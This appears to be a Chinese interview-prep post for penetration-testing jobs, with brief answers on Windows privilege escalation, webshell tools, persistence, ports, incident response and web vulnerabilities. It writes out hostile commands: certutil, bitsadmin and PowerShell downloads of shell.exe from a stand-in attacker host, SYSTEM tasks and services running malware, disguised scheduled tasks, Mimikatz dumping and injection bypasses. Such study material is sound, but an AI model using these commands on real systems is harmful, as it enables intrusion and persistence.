网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年渗透测试面试题总结-拷打题库04
windows 常见的提权方法有哪些? 蚁剑/菜刀/C 刀/冰蝎的相同与不相同之处 windows 环境下有哪些下载文件的命令? 常见的端口号?攻击点? 木马驻留系统的方式有哪些? 常用的威胁情报平台有哪些? 常用的 webshell 检测工具有哪些? 一般情况下。那些漏洞会被高频被用于打点? windows 常用的命令? 应急响应的基本思路是什么? Linux 常用的命令? 蓝队常用的反制手段有哪些? 对我们公司有什么了解,为什么选择本公司 为什么想要应聘这个职位 对安全服务是怎么理解的 如果我不知道渗透测试,两分钟说一下 如果我是一个汽车厂商,你如何证明你的工作是有意义的? 作为应届生,你如何能胜任该职位 你有什么职业规划 如果离职的话是因为什么原因 给不了这么多工资可以接受吗?为什么想要这个数? 对上司有什么要求?喜欢和什么样的领导合作? SQL的存储引擎 SQL注入写shell的条件,用法 GPC是什么?开启了怎么绕过 Mysql一个@和两个@什么区别 IIS解析漏洞,不同版本有什么漏洞,还有什么容器解析漏洞 wireshark抓包,数据报经过三层交换机、路由的变化,NAT协议描述,地址进入内网怎么变化 linux计划任务,黑客隐藏自己的计划任务会怎么做。windows计划任务怎么设定 挖过最难的漏洞是什么
一、Windows常见提权方法
- 漏洞利用:
- 使用未修复的系统漏洞(如MS17-010永恒之蓝、PrintNightmare)。
- 工具:JuicyPotato(滥用COM组件)、RoguePotato(提权至SYSTEM)。
- 服务权限滥用:
- 查找弱权限服务(
accesschk.exe
检查权限),通过修改服务路径注入恶意代码。- 令牌窃取:
- 使用Mimikatz抓取内存中的管理员令牌(
sekurlsa::logonpasswords
)。- 计划任务劫持:
- 创建高权限任务(
schtasks /create /tn "test" /tr "C:\shell.exe" /sc onstart /ru SYSTEM
)。- AlwaysInstallElevated:
- 利用组策略允许普通用户安装MSI包(注册表键值
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
)。
二、蚁剑/菜刀/C刀/冰蝎对比
工具 相同点 不同点 蚁剑 支持Webshell管理 模块化插件、支持多协议(HTTP/Socks5)。 菜刀 基础文件管理 无加密传输、仅支持PHP/ASP。 C刀 轻量级Webshell连接 支持内存加载、绕过部分杀软。 冰蝎 动态加密通信(AES) 流量混淆、支持TCP/UDP隧道。
三、Windows下载文件命令
- certutil:
bash
certutil -urlcache -split -f http://attacker.com/shell.exe C:\shell.exe
- bitsadmin:
bash
bitsadmin /transfer job /download /priority normal http://attacker.com/shell.exe C:\shell.exe
- PowerShell:
powershell
Invoke-WebRequest -Uri http://attacker.com/shell.exe -OutFile C:\shell.exe
- wget(需安装):
bash
wget http://attacker.com/shell.exe -O C:\shell.exe
四、常见端口与攻击点
端口 服务 攻击点 80/443 HTTP/HTTPS SQL注入、XSS、Webshell上传。 445 SMB 永恒之蓝漏洞(MS17-010)、共享爆破。 3389 RDP 弱口令爆破、CVE-2019-0708(BlueKeep)。 3306 MySQL 弱口令登录、SQL注入写Shell。 22 SSH 密钥泄露、暴力破解。
五、木马驻留系统方式
- 注册表启动项:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
。- 服务创建:
sc create "UpdateService" binPath="C:\malware.exe" start=auto
。- 计划任务:
- 创建定时任务执行恶意程序。
- DLL劫持:
- 替换系统程序依赖的DLL文件。
- WMI事件订阅:
- 利用WMI永久事件触发恶意代码。
六、常用威胁情报平台
- VirusTotal:文件/URL/IP威胁检测。
- AlienVault OTX:开源威胁情报共享。
- 微步在线:国内APT攻击情报分析。
- IBM X-Force:漏洞与恶意IP数据库。
七、Webshell检测工具
- D盾:查杀PHP/ASP/ASPX木马。
- 河马WebShell检测:静态特征+行为分析。
- CloudWalker(牧云):实时监控文件变动。
- ClamAV:开源病毒扫描引擎。
八、高频利用漏洞
- SQL注入:直接获取数据库权限。
- RCE(远程代码执行):如Log4j2、Fastjson反序列化。
- 文件上传漏洞:上传Webshell控制服务器。
- SSRF(服务端请求伪造):探测内网或攻击本地服务。
九、Windows常用命令
- 系统信息:
systeminfo
:查看系统版本和补丁。netstat -ano
:检查开放端口和进程。- 用户管理:
net user
:查看/创建用户。whoami /priv
:检查当前权限。- 网络操作:
ipconfig /all
:查看网络配置。arp -a
:显示ARP缓存表。
十、应急响应基本思路
- 准备阶段:制定预案、工具包(如取证工具)。
- 检测与抑制:隔离受感染主机、分析日志(EventLog/Web日志)。
- 根除与恢复:清除恶意文件、修复漏洞。
- 复盘总结:输出事件报告、优化防御策略。
十一、Linux常用命令
- 文件操作:
ls -al
:查看隐藏文件。find / -perm -4000
:查找SUID文件。- 网络排查:
netstat -tulnp
:查看监听端口。tcpdump -i eth0 port 80
:抓包分析。- 进程管理:
ps aux
:查看所有进程。kill -9 PID
:强制终止进程。
十二、蓝队反制手段
- 蜜罐诱捕:部署伪装服务(如Honeypot)。
- 流量分析:使用Wireshark/Zeek检测异常流量。
- 溯源反制:通过攻击IP反向渗透(需法律授权)。
- 日志留存:集中管理日志(如ELK Stack)快速检索。
十三、公司认知与职位动机
- 公司了解:
- 提及公司核心业务(如安全服务、APT追踪)。
- 举例公司产品(如威胁检测平台)。
- 职位选择:
- 强调个人技能匹配(如渗透测试经验)。
- 表达对安全行业的长期热情。
十四、职业规划与能力证明
- 职业规划:
- 短期:精通渗透测试与漏洞挖掘。
- 长期:成为安全架构师或攻防团队负责人。
- 能力证明:
- 举例过往项目(如某次渗透测试成功案例)。
- 强调学习能力(如自学逆向工程)。
十五、技术细节问题
GPC绕过
- 原理:
magic_quotes_gpc
开启时转义单引号等字符。- 绕过:使用宽字节注入(如
%bf%27
)、数字型注入。Mysql变量区别
@var
:用户自定义变量。@@var
:系统变量(如@@version
)。IIS解析漏洞
- IIS6.0:分号截断(
test.asp;.jpg
解析为ASP)。- 其他容器:Nginx解析漏洞(如
test.jpg/.php
)。Wireshark与NAT
- NAT转换:源IP从内网地址(如192.168.1.1)转为公网IP。
- 数据包变化:三层交换基于MAC,路由基于IP,NAT修改IP头部。
十六、计划任务隐藏
- Linux:
- 在
/etc/cron.d/
中创建隐藏文件(如.malware
)。- Windows:
- 使用
schtasks /create /tn "Microsoft\Windows\Update"
伪装系统任务。
十七、最难漏洞挖掘案例
- 案例:某CMS的二次注入漏洞(需构造多步请求触发)。
- 技术点:通过代码审计发现过滤逻辑缺陷,利用时间盲注获取数据。